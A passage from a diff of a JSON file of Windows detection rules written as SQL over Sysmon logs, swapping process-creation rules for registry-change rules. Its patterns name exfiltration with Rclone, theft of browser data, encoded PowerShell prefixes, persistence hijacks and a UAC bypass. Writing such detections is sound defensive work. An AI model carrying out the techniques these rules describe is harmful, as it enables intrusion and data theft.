ESCAPE '\\' OR 
Details LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR Details LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (Details LIKE 'SUVY%' ESCAPE '\\' OR Details LIKE 'SQBFAF%' ESCAPE '\\' OR Details LIKE 'SQBuAH%' ESCAPE '\\' OR Details LIKE 'cwBhA%' ESCAPE '\\' OR Details LIKE 'aWV4%' ESCAPE '\\' OR Details LIKE 'aQBlA%' ESCAPE '\\' OR Details LIKE 'R2V0%' ESCAPE '\\' OR Details LIKE 'dmFy%' ESCAPE '\\' OR Details LIKE 'dgBhA%' ESCAPE '\\' OR Details LIKE 'dXNpbm%' ESCAPE '\\' OR Details LIKE 'H4sIA%' ESCAPE '\\' OR Details LIKE 'Y21k%' ESCAPE '\\' OR Details LIKE 'cABhAH%' ESCAPE '\\' OR Details LIKE 'Qzpc%' ESCAPE '\\' OR Details LIKE 'Yzpc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_jsc.yml" + "filename": "registry_set_suspicious_env_variables.yml" }, { - "title": "WScript or CScript Dropper", - "id": "cea72823-df4d-4567-950c-0b579eaf0846", + "title": "DNS-over-HTTPS Enabled by Registry", + "id": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", "status": "test", - "description": "Detects wscript/cscript executions of scripts located in user directories", - "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", + "author": "Austin Songer", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1140", + "attack.t1112" ], "falsepositives": [ - "Winzip", - "Other self-extractors" + "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE 
'%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\winzip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode' ESCAPE '\\' AND Details = 'secure') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\\\\Enabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" ], - "filename": "proc_creation_win_malware_script_dropper.yml" + "filename": "registry_set_dns_over_https_enabled.yml" }, { - "title": "PUA - Rclone Execution", - "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "title": "Potential Persistence Via Outlook Home Page", + "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "status": "experimental", - "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", - "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Detects potential persistence activity via outlook home pages.", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE 
'%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_rclone_execution.yml" + "filename": "registry_set_persistence_outlook_homepage.yml" }, { - "title": "Findstr Launching .lnk File", - "id": "33339be3-148b-4e16-af56-ad16ec6c7e7b", + "title": "Outlook Security Settings Updated - Registry", + "id": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", "status": "test", - "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", - "author": "Trent Liffick", + "description": "Detects changes to the registry values related to outlook security settings", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036", - 
"attack.t1202", - "attack.t1027.003" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_findstr_lnk.yml" + "filename": "registry_set_office_outlook_security_settings.yml" }, { - "title": "Execution of Powershell Script in Public Folder", - "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "title": "ServiceDll Hijack", + "id": "612e47e9-8a59-43a6-b404-f48683f45bd6", "status": "experimental", - "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. 
This is often used as a method of persistence.", + "author": "frack113", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], "falsepositives": [ - "Unlikely" + "Administrative scripts", + "Installation of a service" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Parameters\\\\ServiceDll' ESCAPE '\\') AND NOT ((Details LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\ServiceDll' ESCAPE '\\' AND Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_powershell_public_folder.yml" + "filename": "registry_set_servicedll_hijack.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher", - "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", + "title": "UAC Bypass Using Windows Media Player - Registry", + "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", "status": "test", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND Details = 'Binary Data')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" + "filename": "registry_set_uac_bypass_wmp.yml" }, { - "title": "Uncommon One Time Only Scheduled Task At 00:00", - "id": "970823b7-273b-460a-8afc-3a6811998529", + "title": "Scheduled TaskCache Change by Uncommon Program", + "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", "status": "experimental", - "description": "Detects scheduled task 
creation events that include suspicious actions, and is run once at 00:00", - "author": "pH-T (Nextron Systems)", + "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "author": "Syed Hasan (@syedhasan009)", + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.t1053.005" + ], "falsepositives": [ - "Software installation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\' AND 
(TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (Image = 'System')))" ], - "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" + "filename": "registry_set_taskcache_entry.yml" }, { - "title": "Esentutl Steals Browser Information", - "id": "6a69f62d-ce75-4b57-8dce-6351eb55b362", + "title": "Potential Persistence Via Scrobj.dll COM Hijacking", + "id": "fe20dda1-6f37-4379-bbe0-a98d400cae90", "status": "experimental", - "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", + "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1005" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Legitimate use" + "Legitimate use of the dll." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName = 'esentutl.exe') AND (CommandLine LIKE '%/r%' ESCAPE '\\' OR CommandLine LIKE '%-r%' ESCAPE '\\') AND CommandLine LIKE '%\\\\Windows\\\\WebCache%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%InprocServer32\\\\(Default)' ESCAPE '\\' AND Details LIKE 'C:\\\\WINDOWS\\\\system32\\\\scrobj.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_esentutl_webcache.yml" + "filename": "registry_set_persistence_scrobj_dll.yml" }, { - "title": "7Zip Compressing Dump Files", - "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", - "status": "experimental", - "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", + "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "status": "test", + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE 
'%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' 
ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE 
'%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" + "filename": "registry_set_chrome_extension.yml" }, { - "title": "MMC20 Lateral Movement", - "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", - "status": "test", - "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent 
